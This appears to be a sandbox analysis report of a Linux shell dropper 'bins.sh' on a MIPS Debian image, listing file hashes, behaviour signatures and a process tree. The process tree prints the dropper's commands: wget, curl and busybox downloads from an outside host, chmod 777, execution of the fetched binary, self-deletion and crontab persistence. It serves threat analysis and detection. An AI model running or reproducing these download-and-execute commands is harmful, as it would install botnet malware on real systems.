Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    09-11-2024 04:20

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    e0e937bb99f87489de87877ed4f4ab32

  • SHA1

    74fc4c4763b0eb2c3fd6ae02b523d07265459f2d

  • SHA256

    bc293307089e34718c81627d4ffe57784dca24f2e79a453d04807a28dd9f84fc

  • SHA512

    ff4a387f24869f556779add942d1b65d76a3f6c0b54e26f66ce483821bcdbdd09f9e050ed5f5dcfed968bca6e098b5663536f595de4c447c31ce57da395f37fa

  • SSDEEP

    192:wjfmNFBfTom+NQs+IxUD3b90sPa2HPDxBHIjfmNFbwm+NQsheD3d0sPa2zPD1:wjfmNFBfTom+NQs+IxEVPDxBHIjfmNFJ

Malware Config

Signatures

  • Contacts a large (2083) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:699
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:704
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:706
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:720
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:729
        • /bin/chmod
          chmod 777 d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • File and Directory Permissions Modification
          PID:730
        • /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          ./d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:731
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:734
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:735
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:736
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:737
            • /bin/rm
              rm d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
              2⤵
                PID:739
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU
                2⤵
                • System Network Configuration Discovery
                PID:830
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU
                2⤵
                • System Network Configuration Discovery
                PID:835

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR

    Filesize

    151KB

    MD5

    3c90d5820bddcf7c5d1bd21dfa49d958

    SHA1

    5ba05bd489e50af97d6dc45e3a0be60e494d5083

    SHA256

    bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

    SHA512

    54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

  • /var/spool/cron/crontabs/tmp.sZrA9v

    Filesize

    210B

    MD5

    7727494e61722805287f19dde48eea08

    SHA1

    d687998bcc23cf9ba045d377024edec06a4798ba

    SHA256

    5d8ebce38ea31268d68fa830d3539cc243540bf5cadaac0064252b7e1ebeb0a9

    SHA512

    2a3aa17205a289af4b955e06d97510f5cd7fa5a33200bb507f6a69080ad15473f18728a52c17c540bcbf83e52f8a3924d6b35dcde0b6015f9cdc0ca4b1510665